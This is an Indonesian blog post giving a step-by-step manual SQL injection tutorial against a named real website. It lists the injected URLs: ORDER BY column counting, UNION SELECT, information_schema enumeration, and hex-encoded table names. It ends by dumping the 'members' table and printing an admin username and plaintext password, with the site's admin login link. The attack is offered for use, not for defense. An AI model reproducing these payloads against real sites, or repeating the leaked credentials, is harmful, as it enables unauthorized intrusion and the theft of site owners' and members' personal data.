Manual SQL Injection

malam-malam iseng gara-gara g bisa tidur…. ya udin coba browsing eh malah nemu tutorial bagus n lumayan lengkap, langsung aj tak bagi2 buat temen2 man tau bermanfaat.

Target : http://www.natoleo.com/Content.php?id=14

1. Cek bug pada suatu website dengan menambahkan single quote ( ‘ ) dibelakang url, ternyata terdapat bug pada http://www.natoleo.com

http://www.natoleo.com/Content.php?id=14’

muncul pesan error: MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\’ order by a.content_order Asc’ at line 1)

2. Untuk mencari column gunakan perintah [order by].order by 1–dimulai dengan angka 1, selanjutnya 2, dst sampe muncul pesan errorpada target kita kali ini, error muncul pada angka 6. MySQL Error: 1054 (Unknown column ‘6’ in ‘order clause’)

http://www.natoleo.com/Content.php?id=14 order by 5–

jadi angka yang diambil adalah 6-1 = 5 (jumlah column adalah 5)

3. Selanjutnya kita akan mencari “angka ajaib” dimana kita bisa melakukan injection dengan perintah [union all select]. Jangan lupa tambahkan tanda kurang ( – ) didepan angka parameter id=14 menjadi id=-14

http://www.natoleo.com/Content.php?id=-14 union all select 1,2,3,4,5–

akan muncul “angka ajaib” : 1

4. Selanjutnya kita cari versi Database MySql-nya dengan perintah “version()” pada angka 1.

http://www.natoleo.com/Content.php?id=-14 union all select version(),2,3,4,5–

muncul tulisan :5.0.51a-community

5. Selanjutnya kita akan mencari table-nya dgn perintah “group_concat(table_name)” pada salah satu angka ajaib dan ” from information_schema.tables where table_schema=database()–” di belakang angka 5

http://www.natoleo.com/Content.php?id=-14 union all select group_concat(table_name),2,3,4,5 from information_schema.tables where table_schema=database()–

muncul nama-nama table: ad_categories,ads,alaris_menu,alaris_sub2_menu,alaris_sub_menu,alaris_users,articles,categories,category_types,
club_statuses,
config,content,course_welcome,emails,er_setting,event_registrations,events,forums,headercontent,kiteads_acls,
kiteads_adclicks,kiteads_adstats,kiteads_adviews,kiteads_affiliates,kiteads_banners,kiteads_cache,kiteads_clients,
kiteads_config,kiteads_images,kiteads_session,kiteads_targetstats,kiteads_userlog,kiteads_zones,link_categories,
links,
links2,linkspic,lookup_countries,lookup_states,members,messages,news,newsletter,pack_grp,pack_lists,package,
products,users_group,welcome

6. Selanjutnya kita cari column dari table yg ada hubungannya dengan user dan password,kali ini kita ambil table “members”sebelumnya kita convert dulu ke hexa agar dapat dibaca oleh Sql di sini :http://undana.ac.id/images/upload/test.html : pada ascii text ketik members lalu klik encode. hasilnya di kolom Hex Value : 6D656D62657273

Perintah selanjutnya adalah “group_concat(column_name)” pada angka ajaib 1 dan ” from information_schema.columns where table_name=0xHexa–” di akhir URL yaitu 6D656D62657273

tambahkan 0x didepan hexa agar server dapat mengetahui bahwa itu telah diconvertke hexa.

http://www.natoleo.com/Content.php?id=-14 union all select group_concat(column_name),2,3,4,5 from information_schema.columns where table_name=0x6D656D62657273–

muncul column: member_id,member_first_name,member_last_name,member_login,member_password,member_email,country_id,
state_id,member_city,member_zip,member_address1,member_address2,member_address3,member_ph_work,
member_ph_work_ext,member_phone_home,member_phone_addl,member_fax,picture_url,website_url,
club_status_id,member_date_added,security_level_id

kita ambil : member_login,member_password

7. Untuk melihat isi dari kedua column tersebut gunakan perintah “group_concat(column1,0x3a,column2)” pada angka ajaib 1 dan from NAMATABLE– pada akhir URL

ganti column1 dengan “member_login” dan column2 dengan “member_password”. 0x3a adalah tanda titik dua ( : ) yang telah diconvert ke hexa. NAMA TABLE diganti dengan “members” untuk mengambil informasi dari table yang bernama”members”

http://www.natoleo.com/Content.php?id=-14 union all select group_concat(member_login,0x3a,member_password),2,3,4,5 from members–

hasilnya akan muncul:

user: wilmarnatoleo

pass: natoleoP@ssword

sekarang tinggal login ke website target..

http://www.natoleo.com/admin/

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s